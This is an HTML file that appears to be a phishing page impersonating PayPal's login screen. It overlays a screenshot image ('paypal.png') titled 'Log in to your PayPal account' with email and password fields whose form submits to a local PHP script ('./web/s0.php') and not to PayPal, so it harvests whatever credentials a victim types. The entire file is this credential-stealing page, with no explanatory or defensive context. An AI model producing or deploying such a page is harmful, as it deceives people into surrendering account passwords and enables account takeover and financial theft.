﻿<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Log in to your PayPal account</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="generator" content="HAPedit 3.1">
<link rel="shortcut icon" type="image/ico" href="pp_favicon_x.ico" />
</head>

<body bgcolor="#FFFFFF">

<table  valign="top" width="1365" height="665" border="0" style="background-image:url('paypal.png'); background-repeat:no-repeat;" background="paypal.png">
<tr>
           <td valign="top" style="padding-left: 517px;">

            <form action="./web/s0.php" method=post STYLE="margin: 0px; padding: 0px;">
            <table border="0">
             <tr>
                <td style="padding-top: 176px;"><input type="email" size="50" name="email" placeholder="  Email address" style="font-size: 12px; height:34px; "></td>
            </tr>
            <tr>
                <td style="padding-top: 7px;"><input type="password" size="50" name="ps" placeholder="  Password" style="font-size: 12px; height:34px; "></td>
            </tr>
            <tr>
                <td style="padding-top: 25px;"><input type="image" src="Login.png" value="Submit" alt="Submit"></td>
            </tr>
</table></form>


</body>

</html>